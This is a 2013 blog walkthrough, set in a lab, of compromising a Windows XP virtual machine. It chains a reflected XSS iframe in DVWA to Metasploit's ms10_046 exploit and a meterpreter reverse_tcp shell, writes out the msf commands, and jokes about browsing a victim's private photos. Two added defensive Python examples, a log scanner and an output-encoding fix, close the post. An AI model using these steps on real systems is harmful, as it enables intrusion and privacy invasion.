Tuesday, June 25, 2013

Owning OS by XSS vulnerability

In this demonstration, I am going to show how even a very common XSS attack can be used to gain access to the whole system. For this I am using two operating systems: one is Kali Linux and the other is a Windows XP machine, which will work as the client. For exploitation I will be using the Metasploit Framework (console). For this particular exploitation there is an exploit named "ms10_046_shortcut_icon_dllloader". Basically, it starts a local server, and that server serves the exploit to the victim. Once the victim opens that URL, he will be hacked.

Let's see.

We first need to start the Metasploit Framework in Kali (or a BackTrack terminal). It is available under Applications => Kali Linux => Exploitation Tools => Metasploit => metasploit framework

Once you start it, it will look something like this.

To perform this exploitation, we need to use the exploit named "ms10_046_shortcut_icon_dllloader", as mentioned in the first paragraph. To use this exploit we need to give the command below.

msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

We can see from the picture below that the exploit is now in use.

Within this exploit there are many payloads. To check the list of all payloads we have to give the command below. It will show the list of all payloads, as shown in the figure.

msf exploit (ms10_046_shortcut_icon_dllloader) > show payloads

For gaining access to or owning the victim's machine, there is one famous payload: meterpreter reverse_tcp. So now we will set this payload from the list. The command to set this payload is as follows.

msf exploit (ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcp

To execute the payload, our configuration must be correct. Every payload has some options which we need to set, such as RHOST, LHOST, LPORT etc., as shown in the figure below.

In our payload we need to set the LHOST option, which will be our attacking machine's IP address. So let's check our attacking machine's IP address with the ifconfig command, and then set that IP address as LHOST.

Let's set this IP address as our LHOST option by giving the command below:

msf exploit (ms10_046_shortcut_icon_dllloader) > set lhost  

Now we will trigger the exploit.

Here we can see that the exploit has given us a URL which has to be opened somehow by the client. As this is a demonstration, we are performing this on a local virtual machine. Here my client is Windows XP.

Now we will jump to Windows XP. As the title says that we can own the OS through an XSS vulnerability in the browser, we have to set up a vulnerable web application.

To do that I have installed the XAMPP server and hosted DVWA (Damn Vulnerable Web Application) on it. It offers several options: we can perform SQL injection, reflected XSS, stored XSS, brute-force attacks, etc. The figure below shows the home page of the XSS vulnerability practice.

It is a normal search bar in which we first put a normal script and wait for the result, in order to confirm whether the script executes correctly or not. The script is as below.


So let's put this script in the search bar and wait for the result.
If we look closely at the URL, it says something like this:


So it means our script is being passed to the server side via the name parameter/variable and is executing.
Here we want to load the local URL given by Metasploit. Metasploit has started a server and is waiting for a client to connect.

We cannot execute the URL here directly. We need to use a simple HTML IFRAME tag, which includes another page's content in the current page.

So for that, after the name parameter we will give this script:

<iframe src=></iframe>

So the original URL will become something like this:

<iframe src=></iframe>

So let's execute this URL in the browser. I shifted from Firefox to IE, so I am executing this URL in IE. (The reason is mentioned in the last section of the report.)

As we can see here, our command got executed, and this is the iframe, which does not contain an image. It's a dynamic view of the C drive's xyz folder. We can actually click on a file, create a new file, or delete these files.

Now let's go back to Metasploit. It was waiting for a client to open its URL in a browser, and it got one. The picture below shows how it exploits the victim's machine in order to create a session.

One session has been created. To view all sessions we need to give the command below:


It will list all sessions, meaning all those clients or victims who opened this URL via the XSS vulnerability.

Now we need to go inside the victim's machine. For that we need to start that session with the following command:

sessions -i 1

Here 1 is the ID number of the session, as shown in the picture.

It will trigger a shell on the Windows machine, and we will be able to operate the command prompt of the victim's machine, as shown in the figure below:

Now let's have fun finding some confidential information.

Let's go to the C directory.

Wo wo wo... I found one folder named Confidential Documents :D Keen to know what's inside that :) Let's go inside it.

Lol, I found honeymoon pics :) really amazing :D

Apart from finding juicy information, we can also check the task list.

So thus we can play around here and have fun in the victim's machine.
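Seen from the web server's side, the request described above (markup arriving in the name parameter) is visible in the access log. The following is an added example, not part of the original post: it scans combined-format log lines for query parameters that decode to an iframe or script tag. The log lines, the /search.php path and the addresses are constructed placeholders.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Tags that load or run remote content, plus javascript: URLs.
SUSPICIOUS = re.compile(r"<\s*(iframe|script|object|embed)\b|javascript\s*:", re.I)
# Client, method, request target and status from a combined-format log line.
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def fully_decode(value, max_rounds=3):
    """Undo layered percent-encoding (%253C -> %3C -> <), with a bound."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_reflected_markup(log_lines):
    """Return (client, parameter, decoded value) for each flagged parameter."""
    hits = []
    for line in log_lines:
        match = REQUEST.match(line)
        if not match:
            continue  # not a request line we understand; skip, do not crash
        client, _method, target, _status = match.groups()
        for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            decoded = fully_decode(value)
            if SUSPICIOUS.search(decoded):
                hits.append((client, key, decoded))
    return hits


# Constructed sample lines; paths and addresses are placeholders.
SAMPLE_LOG = [
    '198.51.100.7 - - [25/Jun/2013:10:01:12 +0000] "GET /search.php?name=alice HTTP/1.1" 200 512',
    '198.51.100.9 - - [25/Jun/2013:10:02:40 +0000] "GET /search.php?name='
    '%3Ciframe+src%3Dhttp%3A%2F%2F192.0.2.10%3A8080%2F%3E%3C%2Fiframe%3E HTTP/1.1" 200 640',
    '198.51.100.9 - - [25/Jun/2013:10:03:05 +0000] "GET /search.php?name='
    '%253Cscript%253Ealert(1)%253C%252Fscript%253E HTTP/1.1" 200 601',
    'truncated line without a request',
]

if __name__ == "__main__":
    for hit in find_reflected_markup(SAMPLE_LOG):
        print(hit)
```

Only GET query strings are covered here; values submitted in a POST body do not appear in a standard access log and need application-level logging.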

Self Critical Evaluation

While performing this practical I faced some difficulties, which are mentioned below. I have also given the solutions for fixing those difficulties and technical issues.

1. MSF update: I set up everything and I was ready to exploit. I came to know that there was no such exploit available in my Metasploit. Even though I have Kali Linux, which is the latest version of BackTrack, there was no such exploit. So I immediately updated my Metasploit and got that exploit. So if you face this problem, update your Metasploit Framework.

2. Firefox / Chrome endless loop: I shifted from Firefox to IE because I was facing some technical difficulties in Firefox and Chrome. When I was executing that iframe script in the browser, it was executing the script a number of times, meaning it was entering an endless loop. When I did the same in IE, it executed just once and got the result. It might be an issue with the browser, JavaScript or Flash. So, to put it in a nutshell, it works fantastically on IE.

3. DVWA security low: If you are giving the script in the search bar and not getting a result, then change the DVWA security from medium or high priority to low priority. Then and only then will it work.
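The low setting matters because the walkthrough depends on the name value being written into the page unencoded. The following is an added example, not DVWA's code and not part of the original post, written in Python rather than DVWA's PHP: it puts an unencoded reflection next to a handler that validates the value, encodes it on output and sends restrictive headers. The "Hello" template, the name pattern and the sample value are assumptions made for the illustration.

```python
import html
import re

# Assumption for this sketch: a display name is letters, digits, space, . _ -
NAME_OK = re.compile(r"[A-Za-z0-9 ._-]{1,64}")

# frame-src 'self' tells a CSP-aware browser not to load frames from other
# origins. Older browsers ignore the header, so encoding remains the real fix.
SECURITY_HEADERS = {
    "Content-Type": "text/html; charset=utf-8",
    "Content-Security-Policy": "default-src 'self'; frame-src 'self'",
    "X-Content-Type-Options": "nosniff",
}


def render_unencoded(name):
    """Writes the parameter into the page as-is (the reflected-XSS condition)."""
    return "<pre>Hello " + name + "</pre>"


def render_encoded(name):
    """Encodes < > & and quotes so the value is displayed, never parsed as HTML."""
    return "<pre>Hello " + html.escape(name, quote=True) + "</pre>"


def handle_request(name):
    """Hardened handler: validate first, encode on output, send security headers."""
    if not NAME_OK.fullmatch(name):
        return 400, SECURITY_HEADERS, render_encoded("invalid name")
    return 200, SECURITY_HEADERS, render_encoded(name)


# Constructed sample value; 192.0.2.10 is a documentation address.
SAMPLE = '<iframe src="http://192.0.2.10:8080/"></iframe>'

if __name__ == "__main__":
    print(render_unencoded(SAMPLE))   # markup reaches the browser intact
    print(render_encoded(SAMPLE))     # markup arrives as inert text
    print(handle_request(SAMPLE)[0])  # rejected before rendering
```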
